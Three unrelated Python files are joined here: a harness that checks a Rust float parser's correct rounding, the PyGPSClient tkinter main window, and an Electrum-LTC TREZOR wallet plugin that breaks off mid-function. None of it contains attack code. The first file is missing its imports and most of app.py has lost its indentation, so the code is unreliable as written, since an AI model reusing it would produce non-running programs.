import binascii
try: # Python 3
import queue as Queue
except ImportError: # Python 2
import Queue
NUM_WORKERS = 2
UPDATE_EVERY_N = 50000
INF = namedtuple('INF', '')()
NEG_INF = namedtuple('NEG_INF', '')()
ZERO = namedtuple('ZERO', '')()
MAILBOX = None # The queue for reporting errors to the main process.
STDOUT_LOCK = threading.Lock()
test_name = None
child_processes = []
exit_status = 0
def msg(*args):
    """Print a progress line prefixed with the current test name.

    Serialized with STDOUT_LOCK so concurrent threads don't interleave output.
    """
    with STDOUT_LOCK:
        print("[" + test_name + "]", *args)
        sys.stdout.flush()
def write_errors():
    """Drain MAILBOX and append every reported error to errors.txt.

    Runs in a thread in the supervisor process and terminates when the
    sentinel ``None`` is received.  On the first error it also prints a
    notice and sets the module-wide ``exit_status`` so main() can fail.
    """
    global exit_status
    have_seen_error = False
    # bug fix: use a context manager so the log file is closed even if an
    # exception escapes the loop (previously f leaked in that case)
    with open("errors.txt", 'w') as f:
        while True:
            args = MAILBOX.get()
            if args is None:
                break
            print(*args, file=f)
            f.flush()
            if not have_seen_error:
                have_seen_error = True
                msg("Something is broken:", *args)
                msg("Future errors logged to errors.txt")
                exit_status = 101
def projectdir():
    """Return the project root: the parent of this script's directory."""
    return os.path.dirname(os.path.dirname(os.path.realpath(__file__)))
def targetdir():
    """Return cargo's target directory inside the project root."""
    return os.path.join(projectdir(), 'target')

def releasedir():
    """Return the release build directory under target/."""
    return os.path.join(targetdir(), 'release')
def cargo():
    """Build the Rust test binaries (``cargo build --release``).

    Temporarily chdirs into the project root for the build.
    """
    path = os.getcwd()
    os.chdir(projectdir())
    try:
        check_call(['cargo', 'build', '--release'])
    finally:
        # bug fix: restore the original working directory even when the
        # build fails (previously a CalledProcessError left us chdir'd)
        os.chdir(path)
def run(test):
    """Run one test binary and validate everything it prints.

    Spawns the Rust subprocess plus NUM_WORKERS validation processes,
    pipes stdout records to them via a bounded queue, and blocks until
    the subprocess exits and the workers finish.
    """
    global test_name
    test_name = test
    t0 = time.perf_counter()
    msg("setting up supervisor")
    command = ['cargo', 'run', '--bin', test, '--release']
    proc = Popen(command, bufsize=1<<20 , stdin=PIPE, stdout=PIPE, stderr=PIPE)
    # shared flag telling workers that no more input will arrive
    done = multiprocessing.Value(ctypes.c_bool)
    queue = multiprocessing.Queue(maxsize=5)#(maxsize=1024)
    workers = []
    for n in range(NUM_WORKERS):
        worker = multiprocessing.Process(name='Worker-' + str(n + 1),
                                         target=init_worker,
                                         args=[test, MAILBOX, queue, done])
        workers.append(worker)
        # remembered so orphans can (in principle) be cleaned up
        child_processes.append(worker)
    for worker in workers:
        worker.start()
    msg("running test")
    interact(proc, queue)
    with done.get_lock():
        done.value = True
    for worker in workers:
        worker.join()
    msg("python is done")
    assert queue.empty(), "did not validate everything"
    dt = time.perf_counter() - t0
    msg("took", round(dt, 3), "seconds")
def interact(proc, queue):
    """Forward the subprocess's stdout lines to the validation queue.

    Reads line-by-line while the process is alive, then drains whatever
    remains after exit.  Non-empty stderr is reported via msg().
    """
    n = 0
    while proc.poll() is None:
        line = proc.stdout.readline()
        if not line:
            continue
        assert line.endswith(b'\n'), "incomplete line: " + repr(line)
        queue.put(line)
        n += 1
        if n % UPDATE_EVERY_N == 0:
            msg("got", str(n // 1000) + "k", "records")
    msg("rust is done. exit code:", proc.returncode)
    # collect any output still buffered after process exit
    rest, stderr = proc.communicate()
    if stderr:
        msg("rust stderr output:", stderr)
    for line in rest.split(b'\n'):
        if not line:
            continue
        queue.put(line)
def main():
    """Entry point: build the binaries, then run all (or the requested) tests.

    Test names may be passed as command-line arguments (without the .rs
    extension); otherwise every non-underscore-prefixed test is run.
    """
    global MAILBOX
    files = glob(f'{projectdir()}/test-parse-random/*.rs')
    basenames = [os.path.basename(i) for i in files]
    all_tests = [os.path.splitext(f)[0] for f in basenames if not f.startswith('_')]
    args = sys.argv[1:]
    if args:
        tests = [test for test in all_tests if test in args]
    else:
        tests = all_tests
    if not tests:
        print("Error: No tests to run")
        sys.exit(1)
    # Compile first for quicker feedback
    cargo()
    # Set up mailbox once for all tests
    MAILBOX = multiprocessing.Queue()
    mailman = threading.Thread(target=write_errors)
    mailman.daemon = True
    mailman.start()
    for test in tests:
        run(test)
    # sentinel terminates the error-logging thread
    MAILBOX.put(None)
    mailman.join()
# ---- Worker thread code ----
# Precomputed exact powers of two covering the double-precision exponent
# range, and the corresponding half-ULP magnitudes, as Fractions.
POW2 = { e: Fraction(2) ** e for e in range(-1100, 1100) }
HALF_ULP = { e: (Fraction(2) ** e)/2 for e in range(-1100, 1100) }
DONE_FLAG = None  # per-worker handle to the shared "no more input" flag (set in init_worker)
def send_error_to_supervisor(*args):
    """Queue an error record for the supervisor's error-logging thread."""
    MAILBOX.put(args)

def init_worker(test, mailbox, queue, done):
    """Worker-process entry point: install shared state, then consume the queue."""
    global test_name, MAILBOX, DONE_FLAG
    test_name = test
    MAILBOX = mailbox
    DONE_FLAG = done
    do_work(queue)

def is_done():
    """Return True once the supervisor has flagged that no more input is coming."""
    with DONE_FLAG.get_lock():
        return DONE_FLAG.value
def do_work(queue):
    """Consume (f64-hex, f32-hex, decimal) records from the queue and validate.

    Returns when the queue is empty and the supervisor set the done flag;
    the short timeout keeps the worker responsive to that flag.
    """
    while True:
        try:
            line = queue.get(timeout=0.01)
        except Queue.Empty:
            if queue.empty() and is_done():
                return
            else:
                continue
        bin64, bin32, text = line.rstrip().split()
        validate(bin64, bin32, text.decode('utf-8'))
def decode_binary64(x):
    """
    Turn a IEEE 754 binary64 into (mantissa, exponent), except 0.0 and
    infinity (positive and negative), which return ZERO, INF, and NEG_INF
    respectively.
    """
    raw = binascii.unhexlify(x)
    assert len(raw) == 8, repr(raw)
    (bits,) = struct.unpack(b'>Q', raw)
    if bits == 0:
        return ZERO
    sign = bits >> 63
    biased_exp = (bits >> 52) & 0x7FF
    frac = bits & 0xFFFFFFFFFFFFF
    if biased_exp == 0x7FF:
        # all-ones exponent: infinity if the fraction is zero, else NaN
        assert frac == 0, "NaN"
        return NEG_INF if sign else INF
    if biased_exp == 0:
        # subnormal (negative zero was handled by the bits == 0 check above
        # only for +0.0; -0.0 lands here with frac == 0)
        if frac == 0:
            return ZERO
        mantissa, exponent = frac, 1 - (1023 + 52)
    else:
        # normal: restore the implicit leading bit, unbias the exponent
        mantissa, exponent = frac | (1 << 52), biased_exp - (1023 + 52)
    return (-mantissa if sign else mantissa, exponent)
def decode_binary32(x):
    """
    Turn a IEEE 754 binary32 into (mantissa, exponent), except 0.0 and
    infinity (positive and negative), which return ZERO, INF, and NEG_INF
    respectively.
    """
    raw = binascii.unhexlify(x)
    assert len(raw) == 4, repr(raw)
    (bits,) = struct.unpack(b'>I', raw)
    if bits == 0:
        return ZERO
    sign = bits >> 31
    biased_exp = (bits >> 23) & 0xFF
    frac = bits & 0x7FFFFF
    if biased_exp == 0xFF:
        # all-ones exponent: infinity (NaN fractions are not asserted here,
        # mirroring the binary64 decoder's asymmetry in the original harness)
        return NEG_INF if sign else INF
    if biased_exp == 0:
        # subnormal; frac == 0 is negative zero
        if frac == 0:
            return ZERO
        mantissa, exponent = frac, 1 - (127 + 23)
    else:
        # normal: restore the implicit leading bit, unbias the exponent
        mantissa, exponent = frac | (1 << 23), biased_exp - (127 + 23)
    return (-mantissa if sign else mantissa, exponent)
# Exact-rational boundaries for the special-value checks (see module
# docstring): values at or below a ZERO_CUTOFF must round to 0.0, values at
# or above an INF_CUTOFF must round to infinity.
MIN_SUBNORMAL_DOUBLE = Fraction(2) ** -1074
MIN_SUBNORMAL_SINGLE = Fraction(2) ** -149 # XXX unsure
MAX_DOUBLE = (2 - Fraction(2) ** -52) * (2 ** 1023)
MAX_SINGLE = (2 - Fraction(2) ** -23) * (2 ** 127)
MAX_ULP_DOUBLE = 1023 - 52
MAX_ULP_SINGLE = 127 - 23
DOUBLE_ZERO_CUTOFF = MIN_SUBNORMAL_DOUBLE / 2
DOUBLE_INF_CUTOFF = MAX_DOUBLE + 2 ** (MAX_ULP_DOUBLE - 1)
SINGLE_ZERO_CUTOFF = MIN_SUBNORMAL_SINGLE / 2
SINGLE_INF_CUTOFF = MAX_SINGLE + 2 ** (MAX_ULP_SINGLE - 1)
def validate(bin64, bin32, text):
    """Check one record: hex-encoded f64 and f32 bits against the decimal text.

    The exact value of *text* is computed with rational arithmetic and each
    decoded float is checked per the rules in the module docstring (0.5 ULP
    for finite values, the cutoff constants for zero/infinity).
    """
    try:
        double = decode_binary64(bin64)
    except AssertionError:
        # dump the offending record before re-raising (e.g. a NaN pattern)
        print(bin64, bin32, text)
        raise
    single = decode_binary32(bin32)
    real = Fraction(text)
    if double is ZERO:
        if real > DOUBLE_ZERO_CUTOFF:
            record_special_error(text, "f64 zero")
    elif double is INF:
        if real < DOUBLE_INF_CUTOFF:
            record_special_error(text, "f64 inf")
    elif double is NEG_INF:
        if -real < DOUBLE_INF_CUTOFF:
            record_special_error(text, "f64 -inf")
    elif len(double) == 2:
        sig, k = double
        validate_normal(text, real, sig, k, "f64")
    else:
        assert 0, "didn't handle binary64"
    if single is ZERO:
        if real > SINGLE_ZERO_CUTOFF:
            record_special_error(text, "f32 zero")
    elif single is INF:
        if real < SINGLE_INF_CUTOFF:
            record_special_error(text, "f32 inf")
    elif single is NEG_INF:
        if -real < SINGLE_INF_CUTOFF:
            record_special_error(text, "f32 -inf")
    elif len(single) == 2:
        sig, k = single
        validate_normal(text, real, sig, k, "f32")
    else:
        assert 0, "didn't handle binary32"
def record_special_error(text, descr):
    """Report an input that wrongly rounded to a special value; descr names it."""
    send_error_to_supervisor(text.strip(), "wrongly rounded to", descr)

def validate_normal(text, real, sig, k, kind):
    """Check a finite result sig * 2^k against the exact value *real*.

    The error must be at most half an ULP for correct rounding."""
    approx = sig * POW2[k]
    error = abs(approx - real)
    if error > HALF_ULP[k]:
        record_normal_error(text, error, k, kind)
def record_normal_error(text, error, k, kind):
    """Report a conversion whose absolute error exceeds half an ULP.

    The error is reported relative to one ULP at exponent *k*; if that ratio
    cannot be represented as a float, its exact Fraction form is sent instead.
    """
    one_ulp = HALF_ULP[k + 1]
    assert one_ulp == 2 * HALF_ULP[k]
    relative_error = error / one_ulp
    text = text.strip()
    try:
        err_repr = float(relative_error)
    except (ValueError, OverflowError):
        # bug fix: the fallback previously read `err_repr` before assignment
        # (NameError); also float() on an out-of-range Fraction raises
        # OverflowError, which the old ValueError-only clause missed.
        err_repr = str(relative_error).replace('/', ' / ')
    send_error_to_supervisor(err_repr, "ULP error on", text, "(" + kind + ")")
# Script entry point: build and run the requested (or all) tests.
if __name__ == '__main__':
    main()
|
app.py | """
PyGPSClient - Main tkinter application class.
Created on 12 Sep 2020
:author: semuadmin
:copyright: SEMU Consulting © 2020
:license: BSD 3-Clause
"""
from threading import Thread
from tkinter import Tk, Frame, N, S, E, W, PhotoImage, font
from .strings import (
TITLE,
MENUHIDESE,
MENUSHOWSE,
MENUHIDESB,
MENUSHOWSB,
MENUHIDECON,
MENUSHOWCON,
MENUHIDEMAP,
MENUSHOWMAP,
MENUHIDESATS,
MENUSHOWSATS,
INTROTXTNOPORTS,
)
from ._version import __version__
from .about_dialog import AboutDialog
from .banner_frame import BannerFrame
from .console_frame import ConsoleFrame
from .filehandler import FileHandler
from .globals import ICON_APP, DISCONNECTED
from .graphview_frame import GraphviewFrame
from .map_frame import MapviewFrame
from .menu_bar import MenuBar
from .serial_handler import SerialHandler
from .settings_frame import SettingsFrame
from .skyview_frame import SkyviewFrame
from .status_frame import StatusFrame
from .ubx_config_dialog import UBXConfigDialog
from .nmea_handler import NMEAHandler
from .ubx_handler import UBXHandler
VERSION = __version__
class App(Frame): # pylint: disable=too-many-ancestors
"""
Main PyGPSClient GUI Application Class
"""
def __init__(self, master, *args, **kwargs):
"""
Set up main application and add frames
:param tkinter.Tk master: reference to Tk root
:param args: optional args to pass to Frame parent class
:param kwargs: optional kwargs to pass to Frame parent class
"""
self.__master = master
Frame.__init__(self, self.__master, *args, **kwargs)
self.__master.protocol("WM_DELETE_WINDOW", self.exit)
self.__master.title(TITLE)
self.__master.iconphoto(True, PhotoImage(file=ICON_APP))
# Set initial widget visibility
self._show_settings = True
self._show_ubxconfig = False
self._show_status = True
self._show_console = True
self._show_map = True
self._show_sats = True
# Instantiate protocol handler classes
self.file_handler = FileHandler(self)
self.serial_handler = SerialHandler(self)
self.nmea_handler = NMEAHandler(self)
self.ubx_handler = UBXHandler(self)
self.dlg_ubxconfig = None
self._config_thread = None
# Load web map api key if there is one
self.api_key = self.file_handler.load_apikey()
self._body()
self._do_layout()
self._attach_events()
# Initialise widgets
self.frm_satview.init_sats()
self.frm_graphview.init_graph()
self.frm_banner.update_conn_status(DISCONNECTED)
def _body(self):
"""
Set up frame and widgets
"""
# these grid weights are what gives the grid its
# 'pack to window size' behaviour
self.__master.grid_columnconfigure(0, weight=1)
self.__master.grid_columnconfigure(1, weight=2)
self.__master.grid_columnconfigure(2, weight=2)
self.__master.grid_rowconfigure(0, weight=0)
self.__master.grid_rowconfigure(1, weight=2)
self.__master.grid_rowconfigure(2, weight=1)
self._set_default_fonts()
self.menu = MenuBar(self)
self.frm_status = StatusFrame(self, borderwidth=2, relief="groove")
self.frm_banner = BannerFrame(self, borderwidth=2, relief="groove")
self.frm_settings = SettingsFrame(self, borderwidth=2, relief="groove")
self.frm_console = ConsoleFrame(self, borderwidth=2, relief="groove")
self.frm_mapview = MapviewFrame(self, borderwidth=2, relief="groove")
self.frm_satview = SkyviewFrame(self, borderwidth=2, relief="groove")
self.frm_graphview = GraphviewFrame(self, borderwidth=2, relief="groove")
self.__master.config(menu=self.menu)
def _do_layout(self):
"""
Arrange widgets in main application frame
"""
self.frm_banner.grid(
column=0, row=0, columnspan=5, padx=2, pady=2, sticky=(N, S, E, W)
)
self._grid_console()
self._grid_sats()
self._grid_map()
self._grid_status()
self._grid_settings()
if self.frm_settings.serial_settings().noports:
self.set_status(INTROTXTNOPORTS, "red")
def _attach_events(self):
"""
Bind events to main application
"""
self.__master.bind("<<ubx_read>>", self.serial_handler.on_read)
self.__master.bind("<<ubx_readfile>>", self.serial_handler.on_read)
self.__master.bind("<<ubx_eof>>", self.serial_handler.on_eof)
self.__master.bind_all("<Control-q>", self.exit)
def _set_default_fonts(self):
"""
Set default fonts for entire application
"""
# pylint: disable=attribute-defined-outside-init
self.font_vsm = font.Font(size=8)
self.font_sm = font.Font(size=10)
self.font_md = font.Font(size=12)
self.font_md2 = font.Font(size=14)
self.font_lg = font.Font(size=18)
def toggle_settings(self):
"""
Toggle Settings Frame on or off
"""
self._show_settings = not self._show_settings
self._grid_settings()
def _grid_settings(self):
"""
Set grid position of Settings Frame
"""
if self._show_settings:
self.frm_settings.grid(
column=4, row=1, rowspan=2, padx=2, pady=2, sticky=(N, W, E)
)
self.menu.view_menu.entryconfig(0, label=MENUHIDESE)
else:
self.frm_settings.grid_forget()
self.menu.view_menu.entryconfig(0, label=MENUSHOWSE)
def toggle_status(self):
"""
Toggle Status Bar on or off
"""
self._show_status = not self._show_status
self._grid_status()
def _grid_status(self):
"""
Position Status Bar in grid
"""
if self._show_status:
self.frm_status.grid(
column=0, row=3, columnspan=5, padx=2, pady=2, sticky=(W, E)
)
self.menu.view_menu.entryconfig(1, label=MENUHIDESB)
else:
self.frm_status.grid_forget()
self.menu.view_menu.entryconfig(1, label=MENUSHOWSB)
def toggle_console(self):
"""
Toggle Console frame on or off
"""
self._show_console = not self._show_console
self._grid_console()
self._grid_sats()
self._grid_map()
def _grid_console(self):
"""
Position Console Frame in grid
"""
if self._show_console:
self.frm_console.grid(
column=0, row=1, columnspan=4, padx=2, pady=2, sticky=(N, S, E, W)
)
self.menu.view_menu.entryconfig(2, label=MENUHIDECON)
else:
self.frm_console.grid_forget()
self.menu.view_menu.entryconfig(2, label=MENUSHOWCON)
def toggle_sats(self):
"""
Toggle Satview and Graphview frames on or off
"""
self._show_sats = not self._show_sats
self._grid_sats()
self._grid_map()
def _grid_sats(self):
"""
Position Satview and Graphview Frames in grid
"""
if self._show_sats:
self.frm_satview.grid(column=0, row=2, padx=2, pady=2, sticky=(N, S, E, W))
self.frm_graphview.grid(
column=1, row=2, padx=2, pady=2, sticky=(N, S, E, W)
)
self.menu.view_menu.entryconfig(4, label=MENUHIDESATS)
else:
self.frm_satview.grid_forget()
self.frm_graphview.grid_forget()
self.menu.view_menu.entryconfig(4, label=MENUSHOWSATS)
def toggle_map(self):
"""
Toggle Map Frame on or off
"""
self._show_map = not self._show_map
self._grid_map()
def _grid_map(self):
"""
Position Map Frame in grid
"""
if self._show_map:
self.frm_mapview.grid(column=2, row=2, padx=2, pady=2, sticky=(N, S, E, W))
self.menu.view_menu.entryconfig(3, label=MENUHIDEMAP)
else:
self.frm_mapview.grid_forget()
self.menu.view_menu.entryconfig(3, label=MENUSHOWMAP)
def set_connection(self, message, color="blue"):
"""
Sets connection description in status bar.
:param str message: message to be displayed in connection label
:param str color: rgb color string
"""
self.frm_status.set_connection(message, color)
def set_status(self, message, color="black"):
"""
Sets text of status bar
:param str message: message to be displayed in status label
:param str color: rgb color string
"""
self.frm_status.set_status(message, color)
def about(self):
"""
Open About dialog
"""
AboutDialog(self)
def ubxconfig(self):
"""
Start UBX Config dialog thread
"""
self._config_thread = Thread(target=self._ubxconfig_thread, daemon=False)
self._config_thread.start()
def _ubxconfig_thread(self):
"""
THREADED PROCESS UBX Configuration Dialog
"""
self.dlg_ubxconfig = UBXConfigDialog(self)
def stop_config_thread(self):
    """
    Stop (wait for) the UBX Configuration dialog thread.
    """
    if self._config_thread is not None:
        # NOTE(review): join() has no timeout, so this blocks until the dialog
        # thread finishes on its own — confirm the dialog is always closed
        # before this is called (e.g. from exit()), otherwise shutdown hangs.
        self._config_thread.join()
def get_master(self):
    """
    Return the application master (Tk root).

    :return: reference to the application master (Tk)
    """
    master = self.__master
    return master
def exit(self, *args, **kwargs):  # pylint: disable=unused-argument
    """
    Kill any running processes and quit application.

    Order matters: reader threads must stop before the serial connection is
    torn down, and the Tk root is destroyed last.
    """
    self.serial_handler.stop_read_thread()
    self.serial_handler.stop_readfile_thread()
    self.stop_config_thread()
    self.serial_handler.disconnect()
    self.__master.destroy()
if __name__ == "__main__":
    # Script entry point: create the Tk root, build the application on it,
    # and hand control to the Tk event loop until the window is closed.
    ROOT = Tk()
    APP = App(ROOT)
    ROOT.mainloop()
|
trezor.py | from binascii import hexlify, unhexlify
import traceback
import sys
from electrum_ltc.util import bfh, bh2u, versiontuple, UserCancelled
from electrum_ltc.bitcoin import (b58_address_to_hash160, xpub_from_pubkey,
TYPE_ADDRESS, TYPE_SCRIPT, is_address)
from electrum_ltc import constants
from electrum_ltc.i18n import _
from electrum_ltc.plugins import BasePlugin, Device
from electrum_ltc.transaction import deserialize, Transaction
from electrum_ltc.keystore import Hardware_KeyStore, is_xpubkey, parse_xpubkey, xtype_from_derivation
from electrum_ltc.base_wizard import ScriptTypeNotSupported
from ..hw_wallet import HW_PluginBase
# TREZOR initialization methods: generate on-device, recover from seed,
# upload a BIP39 mnemonic, or upload a master private key.
TIM_NEW, TIM_RECOVER, TIM_MNEMONIC, TIM_PRIVKEY = range(0, 4)
# Seed-recovery input styles supported by the device.
RECOVERY_TYPE_SCRAMBLED_WORDS, RECOVERY_TYPE_MATRIX = range(0, 2)
# script "generation": legacy P2PKH, segwit wrapped in P2SH, or native segwit.
SCRIPT_GEN_LEGACY, SCRIPT_GEN_P2SH_SEGWIT, SCRIPT_GEN_NATIVE_SEGWIT = range(0, 3)
class TrezorKeyStore(Hardware_KeyStore):
    """Keystore backed by a TREZOR hardware device."""

    hw_type = 'trezor'
    device = 'TREZOR'

    def get_derivation(self):
        """Return the BIP32 derivation-path prefix for this keystore."""
        return self.derivation

    def get_script_gen(self):
        """Map this keystore's script type onto a SCRIPT_GEN_* constant."""
        xtype = xtype_from_derivation(self.derivation)
        if xtype in ('p2wpkh', 'p2wsh'):
            return SCRIPT_GEN_NATIVE_SEGWIT
        elif xtype in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
            return SCRIPT_GEN_P2SH_SEGWIT
        else:
            return SCRIPT_GEN_LEGACY

    def get_client(self, force_pair=True):
        """Obtain a device client via the plugin (may trigger pairing)."""
        return self.plugin.get_client(self, force_pair)

    def decrypt_message(self, sequence, message, password):
        """Not supported by the TREZOR backend; always raises RuntimeError."""
        raise RuntimeError(_('Encryption and decryption are not implemented by {}').format(self.device))

    def sign_message(self, sequence, message, password):
        """Sign *message* on-device at the address derived from *sequence* (change, index)."""
        client = self.get_client()
        address_path = self.get_derivation() + "/%d/%d"%sequence
        address_n = client.expand_path(address_path)
        msg_sig = client.sign_message(self.plugin.get_coin_name(), address_n, message)
        return msg_sig.signature

    def sign_transaction(self, tx, password):
        """
        Sign *tx* on-device, gathering the previous transactions and xpub
        paths the device firmware needs, then delegating to the plugin.
        """
        if tx.is_complete():
            return
        # previous transactions used as inputs
        prev_tx = {}
        # path of the xpubs that are involved
        xpub_path = {}
        for txin in tx.inputs():
            pubkeys, x_pubkeys = tx.get_sorted_pubkeys(txin)
            tx_hash = txin['prevout_hash']
            # Legacy (non-segwit) inputs require the full previous tx so the
            # device can verify input amounts.
            if txin.get('prev_tx') is None and not Transaction.is_segwit_input(txin):
                raise Exception(_('Offline signing with {} is not supported for legacy inputs.').format(self.device))
            prev_tx[tx_hash] = txin['prev_tx']
            # Record the derivation prefix for any xpubkey that is ours.
            for x_pubkey in x_pubkeys:
                if not is_xpubkey(x_pubkey):
                    continue
                xpub, s = parse_xpubkey(x_pubkey)
                if xpub == self.get_master_public_key():
                    xpub_path[xpub] = self.get_derivation()
        self.plugin.sign_transaction(self, tx, prev_tx, xpub_path)
class TrezorPlugin(HW_PluginBase):
    """Hardware-wallet plugin that drives TREZOR devices via python-trezor."""

    # Derived classes provide:
    #
    # class-static variables: client_class, firmware_URL, handler_class,
    # libraries_available, libraries_URL, minimum_firmware,
    # wallet_class, ckd_public, types
    firmware_URL = 'https://wallet.trezor.io'
    libraries_URL = 'https://github.com/trezor/python-trezor'
    minimum_firmware = (1, 5, 2)      # oldest usable device firmware
    keystore_class = TrezorKeyStore
    minimum_library = (0, 9, 0)       # oldest usable python-trezor
    SUPPORTED_XTYPES = ('standard', 'p2wpkh-p2sh', 'p2wpkh', 'p2wsh-p2sh', 'p2wsh')
    MAX_LABEL_LEN = 32

    def __init__(self, parent, config, name):
        """Probe for a usable python-trezor; set self.libraries_available accordingly."""
        HW_PluginBase.__init__(self, parent, config, name)
        try:
            # Minimal test if python-trezor is installed
            import trezorlib
            try:
                library_version = trezorlib.__version__
            except AttributeError:
                # python-trezor only introduced __version__ in 0.9.0
                library_version = 'unknown'
            if library_version == 'unknown' or \
                    versiontuple(library_version) < self.minimum_library:
                self.libraries_available_message = (
                    _("Library version for '{}' is too old.").format(name)
                    + '\nInstalled: {}, Needed: {}'
                    .format(library_version, self.minimum_library))
                self.print_stderr(self.libraries_available_message)
                raise ImportError()
            self.libraries_available = True
        except ImportError:
            # Plugin stays loaded but inert when python-trezor is missing/old.
            self.libraries_available = False
            return
        from . import client
        from . import transport
        import trezorlib.ckd_public
        import trezorlib.messages
        self.client_class = client.TrezorClient
        self.ckd_public = trezorlib.ckd_public
        self.types = trezorlib.messages
        self.DEVICE_IDS = ('TREZOR',)
        self.transport_handler = transport.TrezorTransport()
        self.device_manager().register_enumerate_func(self.enumerate)

    def enumerate(self):
        """Return a Device record for every TREZOR currently reachable."""
        devices = self.transport_handler.enumerate_devices()
        return [Device(d.get_path(), -1, d.get_path(), 'TREZOR', 0) for d in devices]

    def create_client(self, device, handler):
        """
        Connect to *device* and return a client, or None when the device
        cannot be reached, fails a ping, or runs firmware that is too old.
        """
        try:
            self.print_error("connecting to device at", device.path)
            transport = self.transport_handler.get_transport(device.path)
        except BaseException as e:
            self.print_error("cannot connect at", device.path, str(e))
            return None
        if not transport:
            self.print_error("cannot connect at", device.path)
            return
        self.print_error("connected to device at", device.path)
        client = self.client_class(transport, handler, self)
        # Try a ping for device sanity
        try:
            client.ping('t')
        except BaseException as e:
            self.print_error("ping failed", str(e))
            return None
        if not client.atleast_version(*self.minimum_firmware):
            msg = (_('Outdated {} firmware for device labelled {}. Please '
                     'download the updated firmware from {}')
                   .format(self.device, client.label(), self.firmware_URL))
            self.print_error(msg)
            handler.show_error(msg)
            return None
        return client

    def get_client(self, keystore, force_pair=True):
        """Return the (possibly newly paired) client for *keystore*."""
        devmgr = self.device_manager()
        handler = keystore.handler
        with devmgr.hid_lock:
            client = devmgr.client_for_keystore(self, handler, keystore, force_pair)
        # returns the client for a given keystore. can use xpub
        if client:
            client.used()
        return client

    def get_coin_name(self):
        """Coin name string expected by the TREZOR firmware for this network."""
        return "Testnet" if constants.net.TESTNET else "Litecoin"

    def initialize_device(self, device_id, wizard, handler):
        """Ask the user how to initialize the device, then run it on a thread."""
        # Initialization method
        msg = _("Choose how you want to initialize your {}.\n\n"
                "The first two methods are secure as no secret information "
                "is entered into your computer.\n\n"
                "For the last two methods you input secrets on your keyboard "
                "and upload them to your {}, and so you should "
                "only do those on a computer you know to be trustworthy "
                "and free of malware."
                ).format(self.device, self.device)
        choices = [
            # Must be short as QT doesn't word-wrap radio button text
            (TIM_NEW, _("Let the device generate a completely new seed randomly")),
            (TIM_RECOVER, _("Recover from a seed you have previously written down")),
            (TIM_MNEMONIC, _("Upload a BIP39 mnemonic to generate the seed")),
            (TIM_PRIVKEY, _("Upload a master private key"))
        ]
        devmgr = self.device_manager()
        client = devmgr.client_by_id(device_id)
        model = client.get_trezor_model()
        def f(method):
            import threading
            settings = self.request_trezor_init_settings(wizard, method, model)
            # Run the (slow, blocking) device initialization off the GUI thread.
            t = threading.Thread(target=self._initialize_device_safe, args=(settings, method, device_id, wizard, handler))
            t.setDaemon(True)
            t.start()
            wizard.loop.exec_()
        wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)

    def _initialize_device_safe(self, settings, method, device_id, wizard, handler):
        """Wrapper around _initialize_device that reports errors and always resumes the wizard."""
        try:
            self._initialize_device(settings, method, device_id, wizard, handler)
        except UserCancelled:
            pass
        except BaseException as e:
            traceback.print_exc(file=sys.stderr)
            handler.show_error(str(e))
        finally:
            wizard.loop.exit(0)

    def _initialize_device(self, settings, method, device_id, wizard, handler):
        """Perform the chosen TIM_* initialization on the device."""
        item, label, pin_protection, passphrase_protection, recovery_type = settings
        if method == TIM_RECOVER and recovery_type == RECOVERY_TYPE_SCRAMBLED_WORDS:
            handler.show_error(_(
                "You will be asked to enter 24 words regardless of your "
                "seed's actual length. If you enter a word incorrectly or "
                "misspell it, you cannot change it or go back - you will need "
                "to start again from the beginning.\n\nSo please enter "
                "the words carefully!"),
                blocking=True)
        language = 'english'
        devmgr = self.device_manager()
        client = devmgr.client_by_id(device_id)
        if method == TIM_NEW:
            strength = 64 * (item + 2)  # 128, 192 or 256
            u2f_counter = 0
            skip_backup = False
            client.reset_device(True, strength, passphrase_protection,
                                pin_protection, label, language,
                                u2f_counter, skip_backup)
        elif method == TIM_RECOVER:
            word_count = 6 * (item + 2)  # 12, 18 or 24
            client.step = 0
            if recovery_type == RECOVERY_TYPE_SCRAMBLED_WORDS:
                recovery_type_trezor = self.types.RecoveryDeviceType.ScrambledWords
            else:
                recovery_type_trezor = self.types.RecoveryDeviceType.Matrix
            client.recovery_device(word_count, passphrase_protection,
                                   pin_protection, label, language,
                                   type=recovery_type_trezor)
            if recovery_type == RECOVERY_TYPE_MATRIX:
                handler.close_matrix_dialog()
        elif method == TIM_MNEMONIC:
            pin = pin_protection  # It's the pin, not a boolean
            client.load_device_by_mnemonic(str(item), pin,
                                           passphrase_protection,
                                           label, language)
        else:
            pin = pin_protection  # It's the pin, not a boolean
            client.load_device_by_xprv(item, pin, passphrase_protection,
                                       label, language)

    def setup_device(self, device_info, wizard, purpose):
        """Prepare the device for use by a wizard: attach a handler, initialize if needed."""
        devmgr = self.device_manager()
        device_id = device_info.device.id_
        client = devmgr.client_by_id(device_id)
        if client is None:
            raise Exception(_('Failed to create a client for this device.') + '\n' +
                            _('Make sure it is in the correct state.'))
        # fixme: we should use: client.handler = wizard
        client.handler = self.create_handler(wizard)
        if not device_info.initialized:
            self.initialize_device(device_id, wizard, client.handler)
        # Fetching an xpub forces PIN/passphrase entry now, while the wizard is up.
        client.get_xpub('m', 'standard')
        client.used()

    def get_xpub(self, device_id, derivation, xtype, wizard):
        """Return the xpub at *derivation* for the given device, via the wizard as handler."""
        if xtype not in self.SUPPORTED_XTYPES:
            raise ScriptTypeNotSupported(_('This type of script is not supported with {}.').format(self.device))
        devmgr = self.device_manager()
        client = devmgr.client_by_id(device_id)
        client.handler = wizard
        xpub = client.get_xpub(derivation, xtype)
        client.used()
        return xpub

    def get_trezor_input_script_type(self, script_gen, is_multisig):
        """Translate a SCRIPT_GEN_* constant into the firmware's InputScriptType."""
        if script_gen == SCRIPT_GEN_NATIVE_SEGWIT:
            return self.types.InputScriptType.SPENDWITNESS
        elif script_gen == SCRIPT_GEN_P2SH_SEGWIT:
            return self.types.InputScriptType.SPENDP2SHWITNESS
        else:
            if is_multisig:
                return self.types.InputScriptType.SPENDMULTISIG
            else:
                return self.types.InputScriptType.SPENDADDRESS

    def sign_transaction(self, keystore, tx, prev_tx, xpub_path):
        """Build firmware input/output messages for *tx* and sign it on-device."""
        self.prev_tx = prev_tx          # consumed by get_tx() via tx_api
        self.xpub_path = xpub_path      # consumed by tx_inputs()
        client = self.get_client(keystore)
        inputs = self.tx_inputs(tx, True, keystore.get_script_gen())
        outputs = self.tx_outputs(keystore.get_derivation(), tx, keystore.get_script_gen())
